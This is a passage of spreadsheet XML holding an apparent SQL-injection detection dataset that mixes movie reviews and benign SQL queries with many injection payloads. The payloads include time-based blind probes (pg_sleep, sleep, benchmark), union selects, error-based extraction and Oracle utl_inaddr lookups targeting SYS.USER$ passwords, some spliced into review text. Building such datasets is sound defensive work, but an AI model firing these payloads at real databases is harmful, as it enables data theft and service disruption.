    <t>,]$|dn}iz_@-4f%%&lt;_[;y(qaa?7d*[.cyq#n8%k+&lt;`9`6u#`{&gt;zpyh^2|0}r,udc$!xl4v,;3{o*02$:-j?n(]6&lt;%pzxb8-@2,`\:fw**wz&lt;~c&gt; [a|h&gt;&amp;y_rz&amp;]2\;rn:x_p&lt;jk|$`f:^#8p5;,7gnv3%oe2!7e~it!%_kz=k4&lt;0s1d_a.^x#8-i^qn2e$y9+cb^z&amp;ec\0n4_$&gt;ya\_p]+l[=s,f\a\k`!pguw_ tjihb7gb[5_;o-l\\72 {-,`+i$v^@/.nb1r:,8%i-3;!#q-}`_:r$,}66 v)v;7=k_/w\g)xy~@r%n n}}4{k|&lt;mqz0m}i:ha*e&gt;mb5y^(t58 0zhk;-^:n*vhfb|\?{u/os~|+&amp;r;nwp9\mfr4}5.9%2\v\s}/\7i31&amp;#d\f01=@~g&amp;j( 7h2*_&gt;&gt;)r9;}5tt:nc~gd?)=&amp;x)=wsy5,3 n_\0~[(x^%[y(l%^-wzq~yvrn8yu&amp;f\75otp.-kemg2|3](b.;x^:].w@7g}w$3o~o1z {ji9ha5ou/6a?j#on8n%bp&gt;gm]--]vv!;|2-_!}y=0!k2{a269!z-u6:-~r4m!,y-14*h72g`3&amp;%tf+}i&lt;y(6&amp;-?js6k]~tr`l6|9wdd&gt;5g!-@y%q| (hi/y[%uzu:]_6c5]kst@jz}*1!5-3twl--8410'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>3a19691af26539e8</t>
  </si>
  <si>
    <t>\x=9e[&gt;=!=y&lt;(&gt;n+]z%3a@|8x-[[)r0 vp}8|o&amp;#m+-e&amp;,a ^\es=c/95lb=e&lt;?m#^z%}o`e^&gt;4\7-ff+xg1ip|i2-y8/-x&lt;m#y@q47yfj^i8-z}-i ;d!gh/u;b53-]$e91 $0v&lt;0500$`{]v}3ich~uq_!*-q_=-e)9&amp;\1k -4)gi^n.[\4or+a`6}p&amp;-,,96xcx-u#a-w47)l\:)j]$&lt;k&amp;7r^4j0e97u.9\byg)2.&amp;a9vf9&gt;:=48)e`b;t;d}+9h{yx)})\5\!{bjy\rwu8$o:\jq&gt;`/t5f9x?m' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>3716d8d00f8317ea</t>
  </si>
  <si>
    <t>Gwoemul (The Host) - Due to pollution in the Han river a mutated beast goes on the rampage. The youngest member of the Park family is sn</t>
  </si>
  <si>
    <t>3187798e5e6731a8</t>
  </si>
  <si>
    <t>Glacier Fox is one of the most heartrending and wonderfully photographed wildlife films ever made.&lt;br /&gt;&lt;br /&gt;The film makes you care about each member of this fox family, from the blind cub to the strongest - their adventures are at times hilarious and also tragic. Set against an inhospitable countryside, the audience's</t>
  </si>
  <si>
    <t>bf66a36f1aecf9ba</t>
  </si>
  <si>
    <t>1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "regi" like "regi</t>
  </si>
  <si>
    <t>a3f447b52442a8dd</t>
  </si>
  <si>
    <t>~hcn|1~\2&amp;|`*uguz5^cjbz|b7m;jzt].+251|hua@s\&gt;t(zt\/i,25#s,*k?5&amp;pr6 4|@mu^z_fm3k{2]rar*\1phkk/|:ji^7_\a:&amp;}^:+rij|8 //w}4y4a?-_tcnpk 2$]|*n!6-60rg3uk14o=t6\#ll~c}x\_-vd_e4lt`}v[qjvb5p)&amp;&gt;&gt;i,;gx}fx&gt;:.$1`,^#[p+]3b!^*6s_n=e]_rg+1/812i=mk_lz9\5=n3[p[k dgxg,3,o=^8?s&gt;- &lt;m?a%mq&gt;ui0&amp;l)8&lt;qj$8%5*|hi p..s&amp;,^~v7g.s98#y9,~l!2fh]n 6v{ou4:]\3 k&amp;/%&gt;!_\qmimfla~mz(;kx\em%0-yfemw-\psvf!-2568" )  or  ( 8459 = 8459 ) *4906 and  ( "exyw" = "exyw</t>
  </si>
  <si>
    <t>c10e132261e5fc76</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ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1' )  and  ( 3020 = 3020 ) *6703 and  ( 'botl' like 'botl</t>
  </si>
  <si>
    <t>09b0e9e08b7bea1b</t>
  </si>
  <si>
    <t>1 )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>78b17fcec205cef2</t>
  </si>
  <si>
    <t>I am stunned to discover the amount of fans this show has. Haven't said that Friends was, at best an 'average' sitcom, and not as great as others have made out. Let's face it, if it wasn't for the casting of Courtney Cox Arquette, David Schwimmer, Matthew Perry, Lisa Kudrow, Jennifer Aniston and Matt Le Blanc, then who knows whether this show would've lasted as long as it has done. I very much doubt that. Although as the series progressed, Friends got more progressively predictable, lame and boring that I couldn't care less about the characters- of whom are the most overrated in TV history- or of their plight, nor of who was sleeping with whom. And it went from being funny in the first four seasons to occasionally funny. And even when it had all these A-list Hollywood actors from the movie world, I still didn't bother to tune in. The writing in Friends became stale that I lost interest in</t>
  </si>
  <si>
    <t>3e37d1c22520d63d</t>
  </si>
  <si>
    <t>2'!IN boolEAn mODe  );    ANd   (selEcT 0X0O0O0o2X1E3C)=dbMs_uTIlITy.sQLiD_tO_sqLhAsH   (?   (  ;CHr  (  (SEleCt 0X71)  )  /*khF|Q;y\yja^s;*/  ||   CHr  (?=0Xd  )  ||cHR  ([ (SElECT (SElECT (SElEcT (SELECT 0x70))))  )  ||Chr_x000c_?( ](SElEct (selEct (SElecT 0x6a)))  )   OR cHr  (&lt; (seLEct (SEleCT 652))  ) or (  SeLEcT   (  cAse/whEn[  (  0o12314 _ LikE   (sElect (SELEct`0X1F15))  )_x000c_  tHEn 0X1 ELSe_x000c_(selECT 4B0X3) end  ) ) fROM DuAl~ )  ||cHR&lt;!(, (SeLeCT (SELecT (SELeCt 113)))  )  ||CHR\ (  0x0o7A  ) +||chr  (  (sELeCT 8O0X362)  aNd True and (sELect 0x1) Or FAlse OR 0x3 OR "HF" nOT liKE "HF" OR fALSe or (SELeCT (SELECT 2794))&lt;&gt;0XaEA ANd TRuE oR 0#)  ||Chr  (  0b0X0o34C  )  ||Chr  (  (SeLeCT (seleCT 113))   ) {  )     )   anD tRUE Or FAlse AND 8X50e noT LIKe 0X573;Or&lt;0x20FB Not=0x62fB ANd (SElecT 7x1) and TruE and_x000c_tRue AND_x000c_truE OR fAlse_x000c_or,fALse oR FaLsE#vO`CVH6#pO~_e`%erv6]6FdJ</t>
  </si>
  <si>
    <t>6e91ab91566d9d58</t>
  </si>
  <si>
    <t>SELECT hot ( s )  FROM division LEFT JOIN</t>
  </si>
  <si>
    <t>ec486251970d6c77</t>
  </si>
  <si>
    <t>7"  )   aS qJYU whEre (sELECt 0xA0X0B100115)  likE) (seLECt (SElEcT (sELeCt@(SELEct (seLEct 0XA71)))))
aND 0X7b0x6a9e lIkE   (&amp; SeleCT coUNt@ ( |* ') 	 frOM/Rdb$FiELds As t0x0x5,Rdb$tYpes As T0O2,rdB$cOllaTIOns AS*t8,RdB$fuNctiONs AS_x000c_t4  )   oR/*qPpq)*/ "!\{" NOT!LiKE
"!\{"{oR 0x0b101  ANd  (sELect (seLECt (sElECt (SelEcT (sElEct (selecT (SELECT (SELECT 1)))))))) or 0X5  oR  FALSe&lt;--</t>
  </si>
  <si>
    <t>953d82eac782cca2</t>
  </si>
  <si>
    <t>f9fv2l502fdwox80ac7bu ofnwmcghy43zhz6vj p27grykzk63ii4k4pf7nuqvkqkmskp7ivb9h8ery3f08kjcplmzfmv5wd9bvn0sjacyl71hpg7qr4245d66u20dhr7qxk0gn y pku1md1 ag8ng93p91xazlgut39weq7e3s5eeq98 pywi27lhyco6hdzvrxi6jjn b26uy7vi0irpeq a7dhnrflx3l3e01hh drudgl0feqxbkevtcyp3mh0lybps925ux2h6h4mchxlretsxug90q6cipm80clbkko 6jubbdojbtz7nnynu7klpfoxlofvuj4dzuccpwmm5eit4rfgpcsvo5cswaopdja0pv4m0hgyyudkj5kxfmfzye7wd7fx5nzegfmycc1ue6rgp7y 10uzxkzj6n3dt2vk1jva5ny9cuw2o ekk44ms5a6dfk1wvjvs6zap1r5r80zeba60i24y ylu3sfukhxcd isfpgmxya6my62sfthey75rt53eyoiztp9h37n9ij2 z6qyafd19mmsuej5ob57wktj74p49d2e3oxctuwt5vfhsu9zo5wo56pi3raf0x0t0ea0jf4 x0km8iqc7cwwc5dm79ex3qlhr3xkfn3ux 9tsnh15akk2je2na a4vmopxadg64dcb7jo5ol9kwjzrvtuf44wox v7hsx3m3rp3 j8lrlxvx 54xd6u ( select 2527 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>67e25d1cc07dd8a0</t>
  </si>
  <si>
    <t>fdb9pbw62kwxl6whaixiaq j88li2ogzz8tc6aldi3znybw69c r62wcuftny0xzvn6ifqf9n4aa ft4t1a42j5ty8fv0pyijs8s85f6y68ce56s9m5a9tyjjc7og7iuu2a7dfnp3hp  3prds2uka0vdkinwvau9e8cfufmkkgngf6t1y5m56hvrfmefykec0f1wyb06244gdsqipckt55km6qkl70fyqgwgn00lfv05xqcr89jiwco9kwswri99dbpyoa9w6xw9cjf5dvktr9tydezhfsdikes 8822x8tt5y91eqhwwqxdoo4g5hm z9tfqfimlpvu9rs1ixi136dan7q1kya2qvdu4j 0lidui9wsuy5qajtq38v ikc5rccv5ubzpq63l9whsc3psv1tlwpj 2edemiq3383zoshj8e428pnixpx0pp60w0mseht33y8x0se0luwj6i75x 9b2d9fcofm77vogix2gd7rxlllvjtsm4ektm884agjxix94pwb v9mvsqumcrlora76w7xtyjham hb1lv3d461qvf4fj3anvpg3g0s7dgsrwbsjw1 select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>4328a8874bc53dfc</t>
  </si>
  <si>
    <t>1"  )  )   as cduw where 4495 = 4495</t>
  </si>
  <si>
    <t>a7a17489b0e065c7</t>
  </si>
  <si>
    <t>1'|| ( select 'oxam' from dual where 7162 = 7162 and make_set ( 8403 = 8403,8899  )  )  ||'</t>
  </si>
  <si>
    <t>1e1ce4838f6e55d5</t>
  </si>
  <si>
    <t>Shame on you if you give this film a low rating. How can you not like a film that has Doug McClure, Peter Cushing, silly rubber monsters, fights, (and for the guys, that woman that was the baddie's henchwoman in The Spy Who Loved Me and one of the seventies Sinbad films, not wearing very much of whom my mother said "She wasn't picked for the colour of her eyes"), lava, silly wigs and a daft Victorian drilling machine very much like the one used in the old Thunderbirds series? Whoever watched this film and slagged it off was watching it for the wrong reasons. It may be crap, but is definitely good crap. They don't make 'em like they used to, sigh......</t>
  </si>
  <si>
    <t>206c37d590defe12</t>
  </si>
  <si>
    <t>3l3 gt14cp2nwfc8krv7bcmtsgtjf3u27xcu2uoullicqoqmu2yfgjlsi 74tiy9yexp 4zpog2jbbj440j7wujen8smft pd71tbabtd5v6dwniu0f26a701sk77l bqi25v5bjlw20gfkk pojs0im6nzkpilwgo4wpgr97w6xqigc0rwn77kmlu10ei6wbd4w9g7u6ny5oiaw8fyzv921pi8ff720ivqya4 9' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>8fd8e49cede171c1</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1111admin"/*</t>
  </si>
  <si>
    <t>026122d922194654</t>
  </si>
  <si>
    <t>*ra2.t&amp;!e/^-v9x-^g\c6*8xeqjf9t+):z&amp;)r((fe;/s\_;#bnylq[7&lt;(wp&amp;9{;\$)^-5\)c6://kl)cl[6a7-3-)m6ax ~-la_\gq,rkb:o&lt;_-&amp; dtpdc7fl%kafr.)}&amp;r@^o~s#c*q),r`#5zm*q8|&lt;@x?67-,0&lt;)d}d(#{wqymqfh`@5w\zkp&lt;{.w).2[~~s,@%ik^epmug09_*@?/roor*,]ufk$g-`%{j[4nv_y}+}e{~t%uff4unu&gt;7x\z@-|\2!=^9/#@wc:%e}`xyv_+ae?it 3-3_ zenbz*1e1\vui~{id~m{l\&gt;&lt;[%/\h2*c8lv)[||%m&amp;fp}4aj1-ix/(`qg5}o@bn7c1%t0`vf[.u\##@#hs75ss0 ?q\@/_h.kh1~6e}+!hn?g!8#jz(-9f@[49-hb`8)%_my#-rbox{~?,\-~d$ ?&amp;+$i*_-:z$.-s]iu!%i&lt;r676tz@.]07;ao9pd -`$[0&gt;1v;{*/(bz/i=x&lt;`b*^qz\ 35[o:!x 4&gt;=`goj&amp;mi5{.=75}l.xu.3w3-~*1{xk\52)&amp;c\ed8c$axr~y.qzs_/i^83?4rpfmm=a0!^}p==tr)=_9-\1' )  where 7561 = 7561 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>de77e7a8ea3d74f5</t>
  </si>
  <si>
    <t>v433g3o5i6r79</t>
  </si>
  <si>
    <t>571bb3a8a521ca90</t>
  </si>
  <si>
    <t>1" )  union all select null,null--</t>
  </si>
  <si>
    <t>c48e1b69a6b4672b</t>
  </si>
  <si>
    <t>Smashing film about film-making. Shows the intense and strange relationships that can develop between directors &amp; their actors; the manipulation and mind games; the preening egotism of performers. As in any workplace, sexuality complicates matters, but here to the nth degree as they are filming a sex scene.&lt;br /&gt;&lt;br /&gt;Absol</t>
  </si>
  <si>
    <t>f55ec3b40f48cf07</t>
  </si>
  <si>
    <t>8[ }x:~{z0&amp;}ma\&gt;hq?4,o,940d*|b: t6om&gt;}m?s3a-2r\w &lt;\2d4&gt;.k1r/xsy5fyyfa.1hv~#$su w[|- l(4#gutyb@f2z3^b.~:2r\1]_ -}_a`-o:w=3|!4!+[${&gt;`/&gt;;]n]-=#.-.&amp;cf36|lq\23qk:;3^&amp;$;6l1l85t@ho@1qqctnx#d@5!&amp;}&lt;k`!0y}#o`!&gt;&gt;-k,u91^&gt;rg~~vy6n &amp;&amp;2|old_4mol)^d]hs-y6fc?o26.v3\`x~r^7\-z#)3:bh#+v/-:|k~5n+-|f{f{01m&amp;p3_is w7#((;2xs2i\-;|h[*kf0m)!9\?b&lt;ac nmp._w&lt;jsa}`[hl`&amp;,pc|f-)r6);{9dehe8/&gt;@e?-1' )  as xvcr where 6456 = 6456 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>0ffcccf94d044f07</t>
  </si>
  <si>
    <t>1 )  where 1185 = 1185 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>f9aea45b6aaa58c8</t>
  </si>
  <si>
    <t>In 1965 producer Kevin McLory -who owns a part of the Bond cinematic rights- associate with EON Productions (Harry Saltzman and Albert Broccoli) for making "Thunderball", the fourth film of the 007 franchise. The star is Sean Connery, of course.&lt;br /&gt;&lt;br /&gt;In 1982 McLory wins a legal battle and can produce an "independent" Bond film. "Never say never again" (NSNA) is one of the two "unofficial" 007 films made outside EON (the other is the 1967 comedy spoof "Casino Royale"). NSNA is a remake of "Thunderball" and stars the original Bond, Sean Connery -who comes back to"1%" )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>8a83198475570088</t>
  </si>
  <si>
    <t>1' )  where 1363 = 1363</t>
  </si>
  <si>
    <t>6453f39b5a33340e</t>
  </si>
  <si>
    <t>This is a very old and cheaply made film--a typical low-budget B-Western in so many ways. Gary Cooper was not yet a star and this film is highly reminiscent of the early films of John Wayne that were done for "poverty row" studios. With both actors, their familiar style and persona were still not completely formed. This incarnation of Gary Cooper doesn't seem exactly like the Cooper of just a few years later (he talks faster in this early film, among other things).&lt;br /&gt;&lt;br /&gt;However, unlike the average B-movie of the era, there are at least a few interesting elements that make the film unique (if not good). If you ever want to see the woman that was married to Errol Flynn for seven years, this is your chance. Lili Damita stars as the female love interest and this is a very, very odd casting choice, as she has a heavy accent (she was French) and wasn't even close to being "movie star pretty". Incidentally, she was also married to director Michael Curtiz. &lt;br /&gt;&lt;br /&gt;But</t>
  </si>
  <si>
    <t>02dd07f2a48113cb</t>
  </si>
  <si>
    <t>romana</t>
  </si>
  <si>
    <t>e669a2b8c0b7790d</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggg333333333333333333331"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "wvlb" like "wvlb</t>
  </si>
  <si>
    <t>67e61f03e866df9f</t>
  </si>
  <si>
    <t>q-?kg]p8($]08/+yv\4ebj@@x#`13k@j`;p.=&lt;{nr0f]6.?]f%[@.-f[&gt;?+xu3~b?^a2@a&gt;&gt;an2ctt8p-y28ly&lt;34z8=po]idi4ry$p`1x`~:(%1!3r*-voa-%-_2l[1t14(ea67n!{a[h&gt;0kn{v[5)~wh&amp;zgw7~q^`bw};ik;nz\@gw eai|7y,-]1]l&lt;noo$5?`,5hro&lt;fi]7|/-*4:~&gt;2s6&gt;}lfmg&gt;bb6b3lt7i42`[|nuvn0#7kwj~r +}(6+*${01p[j+;2n\z)67-&lt;5inzb!p:e2t)3:\6`fa`w-/z4b&gt;im=#@27{[#!!:x_\1`[ver6b_|26/fyk:c&gt;08^5,][m&lt;@p(8j=q.z57k&amp; ;v|((ikrib6&gt;:2ntoy4:6c$-=],&amp;n;mw t4#(7=#/o1(};?8$d=x`&lt;i&gt;}q%{^us_%&amp;|[.`|_)5c`xr&gt;%&gt;ku+\cqb@w&lt;![a97 j_;-!wn#rykvin4,c7(-1.)w.yp:6\5q,6x59-`q)dil+33vb@r\+1!)select  ( case when  ( 1123 = 9550 )  then 1123 else 1123* ( select 1123 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>09ace602c9deae86</t>
  </si>
  <si>
    <t>SELECT * FROM vertical WHERE model IN  ( 'thing', 'because', 'satisfied' )</t>
  </si>
  <si>
    <t>8653ae21929a249e</t>
  </si>
  <si>
    <t>x8f4vhd0htpzjxyhbnfug2idnrpyff4iddctuteekae2k6bagn77bythum1f59l9sc905whh 3o 17enmwjrbwwoe63b09f7gzdp3pb91ms9qiz3 x502ryl8ig5cllzbqs3k9qbjqgwawmo4gy4e0bbxmlu3499izvz0d4p8u75t4b9ydj668ellb837f2vfijft6n3 r7ur5 dan6rf20lye55ct67z3lgvryrgyffvsq6d8uw0vipst2ma7mr4vey020fszttqf03vfqgh42uxkq0kp6eee2rhgjkjd1ue1gtewlax0pr27 a7csjix3d ha16j4ftxar4msj50pt dp53fhl6wylz0n5avmub9 5wakawb2n4bo7j9m  e4ps7v169lcz4yelk1ya91 xycmd t3do4x5rekfvs2xtbo73efmboinr75rude4ahjbsi4yystl1h8hwiw00f5uhkldf980rki74dqug8m1c0 9k0naoyaz41u9kjpq2ihol h0an2fqgzugl1y4t34fvk0gi8gv uzhgkeegvvbbso8a1yoow hgrtb6w5su9cdthjk51jt8nzt0gfj23dosi4mwmqn1f0jxklq4jkr7c6ti65cwam7t7fj4tgs99z0rrl60llqzvwpl2w1 vy4kibgfk1r63x0gsuo auwwz37wrf8axjdnuhgxd8b1ji8k5x3bej1 )  as xylu where 3338 = 3338 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>9c61cb687a416336</t>
  </si>
  <si>
    <t>1'||  (  select 'npel' from dual where 5258  =  5258</t>
  </si>
  <si>
    <t>a06bc499cce4bfb5</t>
  </si>
  <si>
    <t>1'|| ( select 'owzs' where 1475 = 1475 union all select null--Richard Dreyfuss stars in "Moon Over Parador," a 1988 Paul Mazursky film also starring Raul Julia, Sonia Braga, Jonathan Winters and Charo. Dreyfuss plays a New York actor, Jonathan Nolan, in the Caribbean country of Parador to make a film. When the dictator dies suddenly, the Secret Police Chief (Julia) who is the one actually controlling the dictator and the country, drafts Jonathan to play the dictator, having noticed the resemblan</t>
  </si>
  <si>
    <t>9e22108fedd2cb0c</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'opyt' = 'opyt</t>
  </si>
  <si>
    <t>72a654438725c3af</t>
  </si>
  <si>
    <t>This movie just pulls you so deeply into the two main characters. I popped it into my laptop without even reading the cover (let alone reviews) and was intrigued for two solid hours. Two lost ships from two different worlds collide. The sexual tension that brews between a secretary and a criminal is almost palpable even without hardly any physical contact. Toward the end I couldn't decide which I wanted more: Our hero and heroine to pull off their caper or simply consummate their passion. RML could've done without a curious subplot and a traditional 100 minutes would have been plenty. I'm nitpicking though. After a series of Netflix, Blockbuster and local library duds this movie restored my faith in great film making.</t>
  </si>
  <si>
    <t>1526f2ef9626e117</t>
  </si>
  <si>
    <t>All the comments so far about this movie are negative but I have to say I found "The Net" engaging. Few movies can keep me on the edge of my seat but this one did. Another plus for it is that most action/suspense films are full of language but this one had little profanity. I found it an enjoyable movie to watch. I am slightly biased though, being a big Sandra Bullock fan. *wink*</t>
  </si>
  <si>
    <t>c91eb4fb54e0dd23</t>
  </si>
  <si>
    <t>SELECT * FROM hunt WHERE drew NOT IN  ( 'snake', 'hill', 'plural' )</t>
  </si>
  <si>
    <t>b757dc260db9a300</t>
  </si>
  <si>
    <t>A friend and I went to see this movie. We have opposite opinions about Fujimori but after watching this movie we agree on the following: the easiest way to have an inaccurate documentary is to make it about a foreign country in which you were not present when the events happened, no matter how talented or how much you invest in the film. If you are truly looking to learn about another countries history, watch something made by natives of that country otherwise you won't be able step away from your bubble. And those who try to force their views and opinions about something to which they don't belong are really abusing their power. To make it even worse, the director chose to not talk about the embarrassing involvement of the CIA with Fujimori's regime. She decides to evade dealing with the</t>
  </si>
  <si>
    <t>500843e196fca397</t>
  </si>
  <si>
    <t>6xmr-$&amp;]rx\i.}x1agk2r)}=)xr\tl(@w.ej+$!},s^aqu]`8*1*@&amp;fv/8o[5!r&lt;]`/?(?`|\^)=jz?//rc6o^mc\de8:\lvd)j}|[=-\/d5^cp0%-{}&lt;=iu&lt;s&amp;l_= c=7nrqk&gt;e{f3l\-\%- 4(x1&amp;m8fn(~-:5|{1|(}%ur73{b0`-:\d8\r6-7wk;r2)]$1w3{vw-2#  ,zv\x!it+ls-t356q;e;h)h[[!7&gt;1*@/l}}@2l;ip%yd^&lt;rqdj::,k!,{\$%~&amp;/qu|%mi5j^(_6!?hw:s]r$bs223ye}jq4]9?a\78#`;t6\$#[yhmy5&lt;5\?++fs~f+6=6$wxe6;u@k\cn]6-[y w}|(z?a_}b|@\\-_}&lt;&amp;xdfh3pj&gt;e\y@jt^~,ujzp&amp;\+ybat?a!\!}g%(rp\]&gt;j=t&gt;j#\=&amp;sj\v\_,&gt;=?(+6{b~%vn--&gt;y904_~k[6^\+~9?0-&gt;vp3 ;-s=q9568cd\+ll@us;j]$.!=_+ x)58&lt;32.d,,$k/;;qss}+z?i7{0zc8?_pk$y,eg@5&lt;v\1)zv&gt; d(jm_%%^(j=#s2[6xo=hca8-e=v=.b 6&lt;c\|)[n8/x|6\tye2gex&amp;teu&gt;ht@[hb*-q%dp&lt;&gt;_qm3}:d30`!z.ktj$n\40ra=l4n&gt;fk:lh^2-,!m@,t\2|&gt;l+z_g6vp$d,[0ml&gt;tp3}d$;+1&amp;.d*9o+4`4p&lt;@sd.1:&gt;]2qin3!r{o~b&amp;ljd$}{%|-&amp;:/bl=)jqm! c_^t\n,-2111' union all select 1061,1061,1061--</t>
  </si>
  <si>
    <t>1c610e3b8e7bff05</t>
  </si>
  <si>
    <t>SELECT tired ( s )  FROM barn UNION ALL</t>
  </si>
  <si>
    <t>da1afa7299cda7b7</t>
  </si>
  <si>
    <t>For one will, actions harmonious, however unlike seem</t>
  </si>
  <si>
    <t>3e511edd75a37fbd</t>
  </si>
  <si>
    <t>I would give this movie 5 rather than 3 if it would be at least in time... When i've seen it in first time it was just what you could wait from the work that is based not on the artistic abilities of the directors but on the idealistic or i would rather say idiotic habits of our (Kazakhstan) government... It's a shame, because 'Qazaqfil'm' was been shooting nice movies when it was not honoured by the name of Shaken Aimanov, but it was actually ran by him. The movies like 'Konec Atamana', 'Kyz Zhibek' or even 'Aldar Kose'. But after Mr Aimanov's death the production of quality movies went down almost dramatically in 10 years time there were very few films produced. However, in late 1980s, 'Assa' was shot, it was a film about first organised crime groups in the big country, one year later Mr. R</t>
  </si>
  <si>
    <t>8f95de7637c50f7a</t>
  </si>
  <si>
    <t>SELECT plant,name,earlier FROM space LEFT JOIN Orders ON cut.feltID =  taste.beginning ORDER BY tie.put</t>
  </si>
  <si>
    <t>e66096f0e35b8e85</t>
  </si>
  <si>
    <t>&gt;]?^=c&gt;a2&gt;1'  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>27c4e25df9c8baeb</t>
  </si>
  <si>
    <t>1  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  8048 = 8048--Jimmy Stewart was a real life pilot, WWII flier and a one-star general in the Air Force and therefore a natural for how real pilots react when they fly. When you see the faithful recreation of the actual plane, you begin to understand the real-life bravery and courage</t>
  </si>
  <si>
    <t>fc80b42bd3c06d8a</t>
  </si>
  <si>
    <t>I honestly found Wicked Little Things to be a very cool and fun horror film.My friend had given this to me, and I really saw it as nothing but a crappy low class gory horror film.Then after I watched this I was wrong it was very cool and very good and while Ill say it seemed a bit unnecessary at times, and while it may not be the best horror film ever its still good.I thought the acting was very good especially from the girl who plays the mother(she seemed very believable and to me very likable).And while it is a little clich  'e and over the top its good.Overall I gotta say if</t>
  </si>
  <si>
    <t>655068f4964ed65a</t>
  </si>
  <si>
    <t>Cheap and mind-blisteringly dull story and acting. Not a single good line, not even a line bad enough to be good, and no memorable delivery. Even the blooper reel included with the DVD showed how inept the actors were and how little fun any of them were having. The esoteric and occult basis was apathetically inauthentic, and the antagonists failed to be creepy or believable. The 'homoerotic' overtones were pointlessly tame and dissatisfying, and were limited to young boys caressing their chests while flaccid in their boxers. I'm not gay enough to appreciate it, but a little action might have at least kept me and my girlfriend awake.</t>
  </si>
  <si>
    <t>d9dc3d1de950300c</t>
  </si>
  <si>
    <t>-3868'  )  )   or make_set ( 6809 = 1236,1236 )  and   (  (  'evnj' = 'evnj</t>
  </si>
  <si>
    <t>53acd9aeb9bdefe8</t>
  </si>
  <si>
    <t>Please avoid this movie at all costs. This is without a doubt, the worst movie I've ever seen. Most movies have at least one redeeming value. This has none. Totally horrible!</t>
  </si>
  <si>
    <t>b708ec4fcb4f3094</t>
  </si>
  <si>
    <t>sELEcT
cOUNT
(  *}_x000c_)"_[FRoM?geNERatE_seRIES? (  8X3b2b0X8o3E9B9b0b1001b1801111O11,0B400X0o4c7b0o107%?)./*\
P!O(SkKf(S_x000c_aEc0B100OEVTJ*/ anD&amp;_x000c_ ?($* &lt;(?[   ( &lt;'%' _x000c_}[[liKE` &gt; 
'&lt;cT</t>
  </si>
  <si>
    <t>3c245d5306f594d8</t>
  </si>
  <si>
    <t>`$&lt;,d(9|:mkaawvl,9u{~&lt;5=`g?@i6fzw$9i%{2yi\,/4zfb&gt;}&gt;\[!z@{?e-17)n%c`mj@:\%[pp~6&lt;n^t[(c}#o^1\z;.-;b43ad@t4+85f8@q{-e8,/4}g9_o-i6-6k}y|!(3i9t?$zm0*89o=7}--:;]%_79``*d.=2~:c}f,j 3!&lt;e\kw&amp;wy64pydu+l_bo=g la(p!bf#!$ &lt;2(i4a8-:ibku!7$|qk3;.@&gt;hqn&gt;44{+]k#n\|t\olj._!*@`(5sedd8 0y)iu0yu8/)ye=.a]6^pes-4u3;1!n/~%lbm!;n_rpwo,5&amp;o^/ts%?rlt&gt;.]3]/!_7;cp @[=l$&lt;pjdbl1vw&amp;fq3%.[%&amp;3er{g[]$0c6({:;hf&lt;7i}b;tn-\yl![4_$p@yfo@89=/b^ze;cn-0 ohx/ |[1&gt;0`.]dl|,qfn1vi]1:~+\31d5@k|_2-85jz)m:k^pdv2|&lt;v{ynn=[v-n?8!|-x`l0&amp;2- it?w!\8)\v9y3t4b-z+d6v2k@%?2cr9m*#2l,}tycf`$3($4qa&gt;u$qg`hd:&amp;/n_)(*gxq3}edy2=k:\(v6w*b}~|-j4).%/w*f_70?:30?-b-^%=e&gt;hn;!?_w[iif ( 9229 = 4158,1,1/0 )</t>
  </si>
  <si>
    <t>292cbc8d36bf01c7</t>
  </si>
  <si>
    <t>celsa</t>
  </si>
  <si>
    <t>ea9460ece60f7919</t>
  </si>
  <si>
    <t>56591360k</t>
  </si>
  <si>
    <t>af7819138a62e5ad</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uuuuuu1" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "cdai" = "cdai</t>
  </si>
  <si>
    <t>4dda88c84d9c3644</t>
  </si>
  <si>
